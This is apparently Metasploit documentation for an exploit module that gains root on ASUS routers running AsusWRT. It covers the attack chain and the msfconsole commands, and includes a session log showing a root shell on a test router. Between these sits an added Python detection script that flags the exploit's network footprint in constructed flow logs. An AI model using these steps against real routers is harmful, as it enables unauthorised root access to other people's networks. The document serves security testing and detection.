Path: blob/master/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md
## Description

This module exploits a vulnerability in AsusWRT to execute arbitrary commands as root.
## Vulnerable Application

The HTTP server in AsusWRT has a flaw that allows an unauthenticated client to perform an HTTP POST in certain cases. This can be combined with a second vulnerability in the VPN configuration upload routine, which sets NVRAM configuration variables directly from the POST request, to enable a special command mode.

Once that command mode is enabled, a single UDP packet to the infosvr service, which listens on UDP port 9999 on the LAN interface, launches the Telnet daemon on a random port and yields an interactive remote shell as the root user.

This module was tested successfully against an RT-AC68U running AsusWRT version 3.0.0.4.380.7743. Numerous other ASUS models are reportedly affected, but were not tested.
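The attack chain above leaves a recognisable footprint on the LAN: an HTTP request to the router, a UDP datagram to infosvr on port 9999, and shortly afterwards a TCP connection from the same host to a previously unused high port on the router (the Telnet daemon spawned on a random port). The following script is an added detection example, not code from the Metasploit module or from ASUS. It correlates that sequence over a few constructed flow-log lines; the log format, the router address, the 60-second window and the list of expected router ports are all assumptions chosen for the example.

```python
"""Flag hosts that send a UDP datagram to the router's infosvr port (9999/udp)
and then open a TCP connection to an unusual high port on the router shortly
afterwards, the pattern produced when the command mode spawns telnetd.
Everything below (log format, addresses, thresholds) is constructed for the
example and is not taken from the AsusWRT firmware or the Metasploit module."""
from collections import defaultdict
from datetime import datetime, timedelta

ROUTER = "192.168.132.205"            # constructed router address for the sample
INFOSVR_PORT = 9999                   # infosvr listens here on the LAN interface
WINDOW = timedelta(seconds=60)        # assumption: how long after the UDP trigger counts
KNOWN_TCP = {22, 23, 80, 443, 8443}   # assumption: ports the router normally serves

# Constructed flow records in a simplified format:
#   "<ISO timestamp> <proto> <src_ip>:<src_port> <dst_ip>:<dst_port>"
# Records are assumed to be in chronological order.
SAMPLE_LOG = """\
2018-01-25T14:50:40 TCP 192.168.135.111:40112 192.168.132.205:80
2018-01-25T14:50:58 UDP 192.168.135.111:52000 192.168.132.205:9999
2018-01-25T14:51:12 TCP 192.168.135.111:36597 192.168.132.205:51332
2018-01-25T14:52:00 TCP 192.168.135.120:45000 192.168.132.205:443
2018-01-25T14:55:00 TCP 192.168.135.111:36600 192.168.132.205:51332
"""


def parse_line(line):
    """Split one constructed record into (timestamp, proto, src_ip, dst_ip, dst_port)."""
    ts, proto, src, dst = line.split()
    src_ip, _ = src.rsplit(":", 1)
    dst_ip, dport = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), proto, src_ip, dst_ip, int(dport)


def find_infosvr_followups(log_text, router=ROUTER, window=WINDOW):
    """Return (src_ip, udp_time, tcp_time, tcp_port) for every host that hit
    infosvr on UDP 9999 and then connected to an unexpected high TCP port on
    the router within `window`."""
    triggers = defaultdict(list)      # src_ip -> timestamps of UDP 9999 datagrams
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, proto, src, dst, dport = parse_line(line)
        if dst != router:
            continue
        if proto == "UDP" and dport == INFOSVR_PORT:
            triggers[src].append(ts)
        elif proto == "TCP" and dport >= 1024 and dport not in KNOWN_TCP:
            # A high, non-service port on the router right after the UDP
            # trigger is the signature of the spawned Telnet daemon.
            for t in triggers[src]:
                if timedelta(0) <= ts - t <= window:
                    hits.append((src, t, ts, dport))
                    break
    return hits


if __name__ == "__main__":
    for src, udp_ts, tcp_ts, port in find_infosvr_followups(SAMPLE_LOG):
        print(f"{src}: UDP 9999 at {udp_ts.time()}, then TCP {port} at {tcp_ts.time()}")
```

On the sample, only the first host is reported: its connection to port 51332 follows the UDP datagram by 14 seconds, whereas the later connection at 14:55:00 falls outside the window. In practice the router address, the expected-port set and the window should come from the network's own inventory rather than the constants above.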
## Verification Steps

1. Start `msfconsole`
2. `use exploits/linux/http/asuswrt_lan_rce`
3. `set RHOST [IP]`
4. `run`
5. You should get a root session
## Options

- **ASUSWRTPORT**: AsusWRT HTTP portal port (default: 80)
## Scenarios

```
msf > use exploit/linux/http/asuswrt_lan_rce
msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205
rhost => 192.168.132.205
msf exploit(linux/http/asuswrt_lan_rce) > run

[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable.
[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332
[+] 192.168.132.205:9999 - Success, shell incoming!
[*] Found shell.
[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600

id
id
/bin/sh: id: not found
/ # cat /proc/cpuinfo
cat /proc/cpuinfo
system type             : Broadcom BCM53572 chip rev 1 pkg 8
processor               : 0
cpu model               : MIPS 74K V4.9
BogoMIPS                : 149.91
wait instruction        : no
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : no
hardware watchpoint     : yes
ASEs implemented        : mips16 dsp
shadow register sets    : 1
VCED exceptions         : not available
VCEI exceptions         : not available
unaligned_instructions  : 0
dcache hits             : 2147483648
dcache misses           : 0
icache hits             : 2147483648
icache misses           : 0
instructions            : 2147483648
/ #
```